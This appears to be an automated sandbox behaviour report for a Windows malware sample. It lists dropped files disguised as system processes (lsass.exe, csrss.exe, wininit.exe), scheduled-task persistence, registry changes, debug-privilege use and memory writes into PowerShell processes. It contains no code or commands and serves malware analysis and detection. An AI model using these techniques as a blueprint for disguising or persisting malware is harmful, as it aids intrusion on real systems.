| File opened for modification | C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\sppsvc.exe | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Photo Viewer\RCX6AC1.tmp | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Photo Viewer\RCX6D54.tmp | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A |
| File created | C:\Program Files (x86)\Windows Photo Viewer\6203df4a6bafc7 | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A |
| File created | C:\Program Files (x86)\Windows Photo Viewer\wininit.exe | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Defender\RCX5C5D.tmp | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\RCX60C5.tmp | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Photo Viewer\RCX6CD6.tmp | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A |
| File created | C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\0a1fd5f707cd16 | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A |
| File created | C:\Program Files\Windows NT\TableTextService\en-US\csrss.exe | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A |
| File created | C:\Program Files\Windows NT\TableTextService\en-US\886983d96e3d3e | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Defender\RCX5C4D.tmp | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\Adobe\RCX7899.tmp | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\Adobe\RCX781B.tmp | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A |
| File created | C:\Program Files (x86)\Windows Defender\dllhost.exe | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A |
| File created | C:\Program Files (x86)\Windows Defender\5940a34987c991 | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A |
| File created | C:\Program Files (x86)\Common Files\Adobe\sihost.exe | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\RCX60D6.tmp | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Photo Viewer\RCX6AC0.tmp | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A |
| File created | C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\sppsvc.exe | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Defender\dllhost.exe | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A |
| File opened for modification | C:\Program Files\dotnet\RCX716D.tmp | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A |
| File opened for modification | C:\Program Files\dotnet\RCX717E.tmp | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Photo Viewer\lsass.exe | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Windows Photo Viewer\wininit.exe | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\Adobe\sihost.exe | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A |
| File created | C:\Program Files (x86)\Windows Photo Viewer\56085415360792 | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A |
| File created | C:\Program Files\dotnet\smss.exe | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A |
| File created | C:\Program Files\dotnet\69ddcba757bf72 | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A |
| File opened for modification | C:\Program Files\Windows NT\TableTextService\en-US\RCX6F59.tmp | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A |
| File opened for modification | C:\Program Files\Windows NT\TableTextService\en-US\csrss.exe | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A |

Drops file in Windows directory

| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File created | C:\Windows\es-ES\fontdrvhost.exe | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A |
| File created | C:\Windows\es-ES\5b884080fd4f94 | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A |
| File created | C:\Windows\ShellExperiences\6203df4a6bafc7 | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A |
| File opened for modification | C:\Windows\es-ES\fontdrvhost.exe | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A |
| File opened for modification | C:\Windows\Downloaded Program Files\RCX7B1B.tmp | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A |
| File created | C:\Windows\ShellExperiences\lsass.exe | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A |
| File opened for modification | C:\Windows\Downloaded Program Files\RCX7A9D.tmp | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A |
| File created | C:\Windows\Downloaded Program Files\55b276f4edf653 | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A |
| File created | C:\Windows\Downloaded Program Files\StartMenuExperienceHost.exe | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A |
| File opened for modification | C:\Windows\es-ES\RCX630A.tmp | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A |
| File opened for modification | C:\Windows\es-ES\RCX6388.tmp | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A |
| File opened for modification | C:\Windows\ShellExperiences\RCX682E.tmp | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A |
| File opened for modification | C:\Windows\ShellExperiences\RCX682F.tmp | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A |
| File opened for modification | C:\Windows\ShellExperiences\lsass.exe | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A |
| File opened for modification | C:\Windows\Downloaded Program Files\StartMenuExperienceHost.exe | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A |

Enumerates physical storage devices

Creates scheduled task(s)

persistence
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |

Modifies registry class

| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key created | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings | C:\Users\All Users\Start Menu\dwm.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings | C:\Users\All Users\Start Menu\dwm.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings | C:\Users\All Users\Start Menu\dwm.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings | C:\Users\All Users\Start Menu\dwm.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings | C:\Users\All Users\Start Menu\dwm.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings | C:\Users\All Users\Start Menu\dwm.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings | C:\Users\All Users\Start Menu\dwm.exe | N/A |

Suspicious behavior: EnumeratesProcesses

| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A |

Suspicious use of AdjustPrivilegeToken

| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\All Users\Start Menu\dwm.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\All Users\Start Menu\dwm.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\All Users\Start Menu\dwm.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\All Users\Start Menu\dwm.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\All Users\Start Menu\dwm.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\All Users\Start Menu\dwm.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\All Users\Start Menu\dwm.exe | N/A |

Suspicious use of WriteProcessMemory

| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| PID 228 wrote to memory of 1212 | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 228 wrote to memory of 1212 | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 228 wrote to memory of 2572 | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 228 wrote to memory of 2572 | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 228 wrote to memory of 4544 | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 228 wrote to memory of 4544 | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 228 wrote to memory of 2508 | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 228 wrote to memory of 2508 | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 228 wrote to memory of 4856 | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 228 wrote to memory of 4856 | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 228 wrote to memory of 3716 | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 228 wrote to memory of 3716 | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 228 wrote to memory of 396 | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 228 wrote to memory of 396 | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 228 wrote to memory of 1744 | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 228 wrote to memory of 1744 | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 228 wrote to memory of 3948 | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 228 wrote to memory of 3948 | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 228 wrote to memory of 3372 | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 228 wrote to memory of 3372 | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 228 wrote to memory of 2424 | N/A | C:\Users\Admin\AppData\Local\Temp\1553f67a0859a3057cde01f77db9dbc0_NeikiAnalytics.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
